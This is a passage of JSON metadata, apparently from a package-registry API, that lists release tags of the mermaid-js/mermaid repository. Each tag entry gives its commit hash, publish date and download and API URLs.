https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:git